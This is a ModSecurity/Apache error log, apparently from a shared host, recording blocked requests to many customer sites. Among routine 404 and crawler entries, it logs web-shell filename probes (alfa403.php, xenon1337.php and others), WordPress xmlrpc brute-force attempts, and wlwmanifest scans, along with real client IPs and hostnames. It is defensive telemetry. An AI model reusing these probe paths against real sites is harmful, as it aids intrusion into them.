[Tue May 26 14:13:47.310658 2026] [security2:error] [pid 598542:tid 598774] [client 202.141.30.10:65459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdQ_4iWyZxnXeAW3I9pAAAAGY"]
[Tue May 26 14:13:48.405968 2026] [security2:error] [pid 598542:tid 598770] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdQ_4iWyZxnXeAW3I9uQAAAGI"]
[Tue May 26 14:13:48.727089 2026] [security2:error] [pid 598542:tid 598736] [client 161.35.49.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVdRP4iWyZxnXeAW3I9wgAAAEA"], referer: https://www.bloggertarget.com/
[Tue May 26 14:13:48.961477 2026] [security2:error] [pid 598542:tid 598786] [client 114.119.136.14:31921] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/wp-content/uploads/open-mouth-let-s-check-your-throat-min-scaled.jpg"] [unique_id "ahVdRP4iWyZxnXeAW3I9zAAAAHI"], referer: https://mahehealthcare.com/wp-content/uploads/open-mouth-let-s-check-your-throat-min-scaled.jpg
[Tue May 26 14:13:50.694362 2026] [security2:error] [pid 598542:tid 598783] [client 113.180.198.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVdRv4iWyZxnXeAW3I98wAAAG8"], referer: https://www.bloggertarget.com/
[Tue May 26 14:13:51.166794 2026] [security2:error] [pid 598542:tid 598770] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdRv4iWyZxnXeAW3I9-QAAAGI"]
[Tue May 26 14:13:52.127901 2026] [security2:error] [pid 598542:tid 598773] [client 114.119.150.166:44517] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVdSP4iWyZxnXeAW3I-GAAAAGU"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&page=9&product_id=194
[Tue May 26 14:13:53.394934 2026] [security2:error] [pid 598542:tid 598713] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdSP4iWyZxnXeAW3I-LwAAACk"]
[Tue May 26 14:13:54.646429 2026] [security2:error] [pid 598542:tid 598780] [client 85.208.96.209:63186] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahVdSv4iWyZxnXeAW3I-VAAAAGw"]
[Tue May 26 14:13:54.646636 2026] [security2:error] [pid 598542:tid 598780] [client 85.208.96.209:63186] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/list/"] [unique_id "ahVdSv4iWyZxnXeAW3I-VAAAAGw"]
[Tue May 26 14:13:55.686509 2026] [security2:error] [pid 598542:tid 598711] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdS_4iWyZxnXeAW3I-awAAACc"]
[Tue May 26 14:13:55.993183 2026] [ssl:error] [pid 598542:tid 598687] [client 66.132.186.193:26940] AH02032: Hostname thedebateafrica.org (default host as no SNI was provided) and hostname www.herbalplus.thedebateafrica.org provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:13:57.402912 2026] [security2:error] [pid 598542:tid 598694] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdTP4iWyZxnXeAW3I-lgAAABY"]
[Tue May 26 14:13:58.411670 2026] [security2:error] [pid 598542:tid 598756] [client 202.141.30.10:65415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdTv4iWyZxnXeAW3I-sgAAAFQ"]
[Tue May 26 14:13:58.412008 2026] [security2:error] [pid 598542:tid 598756] [client 202.141.30.10:65415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdTv4iWyZxnXeAW3I-sgAAAFQ"]
[Tue May 26 14:13:59.506604 2026] [security2:error] [pid 598542:tid 598723] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdT_4iWyZxnXeAW3I-xQAAADM"]
[Tue May 26 14:14:00.574677 2026] [security2:error] [pid 598542:tid 598724] [client 104.219.133.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdUP4iWyZxnXeAW3I-4gAAADQ"]
[Tue May 26 14:14:02.328963 2026] [security2:error] [pid 598542:tid 598736] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdUf4iWyZxnXeAW3I_DwAAAEA"]
[Tue May 26 14:14:03.914388 2026] [security2:error] [pid 598542:tid 598675] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdU_4iWyZxnXeAW3I_MAAAAAM"]
[Tue May 26 14:14:05.596306 2026] [security2:error] [pid 598542:tid 598614] [remote 74.7.241.58:44504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVdVf4iWyZxnXeAW3I_UgAAQEc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 14:14:06.298306 2026] [security2:error] [pid 598542:tid 598721] [client 35.193.170.85:51906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.170.193.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mahehealthcare.com"] [uri "/xmlrpc.php"] [unique_id "ahVdVv4iWyZxnXeAW3I_YgAAADE"]
[Tue May 26 14:14:06.537906 2026] [security2:error] [pid 598542:tid 598699] [client 35.193.170.85:64117] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVdVv4iWyZxnXeAW3I_cwAAABs"]
[Tue May 26 14:14:06.625892 2026] [security2:error] [pid 598542:tid 598711] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdVv4iWyZxnXeAW3I_aQAAACc"]
[Tue May 26 14:14:06.864578 2026] [security2:error] [pid 598542:tid 598754] [client 35.193.170.85:50584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVdVv4iWyZxnXeAW3I_eAAAAFI"]
[Tue May 26 14:14:07.197169 2026] [security2:error] [pid 598542:tid 598685] [client 35.193.170.85:56870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVdV_4iWyZxnXeAW3I_gwAAAA0"]
[Tue May 26 14:14:07.527025 2026] [security2:error] [pid 598542:tid 598677] [client 35.193.170.85:61008] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVdV_4iWyZxnXeAW3I_iAAAAAU"]
[Tue May 26 14:14:07.579818 2026] [security2:error] [pid 598542:tid 598770] [client 20.151.112.53:51854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_hwAAAGI"]
[Tue May 26 14:14:07.580041 2026] [security2:error] [pid 598542:tid 598770] [client 20.151.112.53:51854] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_hwAAAGI"]
[Tue May 26 14:14:07.676961 2026] [security2:error] [pid 598542:tid 598710] [client 35.193.170.85:57670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVdV_4iWyZxnXeAW3I_jAAAACY"]
[Tue May 26 14:14:07.728783 2026] [security2:error] [pid 598542:tid 598736] [client 20.151.112.53:39517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_kAAAAEA"]
[Tue May 26 14:14:07.728900 2026] [security2:error] [pid 598542:tid 598736] [client 20.151.112.53:39517] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_kAAAAEA"]
[Tue May 26 14:14:07.930726 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:39531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_kQAAAHs"]
[Tue May 26 14:14:07.930856 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:39531] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahVdV_4iWyZxnXeAW3I_kQAAAHs"]
[Tue May 26 14:14:07.938982 2026] [security2:error] [pid 598542:tid 598705] [client 35.193.170.85:55504] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVdV_4iWyZxnXeAW3I_kgAAACE"]
[Tue May 26 14:14:08.088804 2026] [security2:error] [pid 598542:tid 598763] [client 20.151.112.53:39528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_mgAAAFs"]
[Tue May 26 14:14:08.088919 2026] [security2:error] [pid 598542:tid 598763] [client 20.151.112.53:39528] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_mgAAAFs"]
[Tue May 26 14:14:08.175128 2026] [security2:error] [pid 598542:tid 598717] [client 35.193.170.85:63407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVdWP4iWyZxnXeAW3I_mwAAAC0"]
[Tue May 26 14:14:08.241539 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:22250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_nwAAADI"]
[Tue May 26 14:14:08.241651 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:22250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_nwAAADI"]
[Tue May 26 14:14:08.361035 2026] [security2:error] [pid 598542:tid 598739] [client 35.193.170.85:60113] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVdWP4iWyZxnXeAW3I_oAAAAEM"]
[Tue May 26 14:14:08.394817 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:51894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_oQAAAFw"]
[Tue May 26 14:14:08.394900 2026] [security2:error] [pid 598542:tid 598764] [client 20.151.112.53:51894] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_oQAAAFw"]
[Tue May 26 14:14:08.556996 2026] [security2:error] [pid 598542:tid 598698] [client 20.151.112.53:35397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_pwAAABo"]
[Tue May 26 14:14:08.557076 2026] [security2:error] [pid 598542:tid 598698] [client 20.151.112.53:35397] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_pwAAABo"]
[Tue May 26 14:14:08.683648 2026] [security2:error] [pid 598542:tid 598787] [client 35.193.170.85:63262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mahehealthcare.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVdWP4iWyZxnXeAW3I_rAAAAHM"]
[Tue May 26 14:14:08.708036 2026] [security2:error] [pid 598542:tid 598716] [client 20.151.112.53:51938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_rQAAACw"]
[Tue May 26 14:14:08.708168 2026] [security2:error] [pid 598542:tid 598716] [client 20.151.112.53:51938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_rQAAACw"]
[Tue May 26 14:14:08.910034 2026] [security2:error] [pid 598542:tid 598793] [client 20.151.112.53:39509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_uAAAAHk"]
[Tue May 26 14:14:08.910146 2026] [security2:error] [pid 598542:tid 598793] [client 20.151.112.53:39509] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahVdWP4iWyZxnXeAW3I_uAAAAHk"]
[Tue May 26 14:14:09.080840 2026] [security2:error] [pid 598542:tid 598701] [client 20.151.112.53:51844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wAAAAB0"]
[Tue May 26 14:14:09.080968 2026] [security2:error] [pid 598542:tid 598701] [client 20.151.112.53:51844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wAAAAB0"]
[Tue May 26 14:14:09.158219 2026] [security2:error] [pid 598542:tid 598718] [client 45.94.31.11:49647] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVdWf4iWyZxnXeAW3I_wQAAAC4"]
[Tue May 26 14:14:09.189335 2026] [security2:error] [pid 598542:tid 598749] [client 202.141.30.10:65352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wgAAAE0"]
[Tue May 26 14:14:09.189464 2026] [security2:error] [pid 598542:tid 598749] [client 202.141.30.10:65352] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wgAAAE0"]
[Tue May 26 14:14:09.232476 2026] [security2:error] [pid 598542:tid 598785] [client 20.151.112.53:22253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wwAAAHE"]
[Tue May 26 14:14:09.232579 2026] [security2:error] [pid 598542:tid 598785] [client 20.151.112.53:22253] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_wwAAAHE"]
[Tue May 26 14:14:09.387453 2026] [security2:error] [pid 598542:tid 598690] [client 20.151.112.53:51915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_xwAAABI"]
[Tue May 26 14:14:09.387554 2026] [security2:error] [pid 598542:tid 598690] [client 20.151.112.53:51915] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_xwAAABI"]
[Tue May 26 14:14:09.484759 2026] [security2:error] [pid 598542:tid 598685] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_vwAAAA0"]
[Tue May 26 14:14:09.617941 2026] [security2:error] [pid 598542:tid 598710] [client 45.94.31.11:49955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.31.94.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_ywAAACY"]
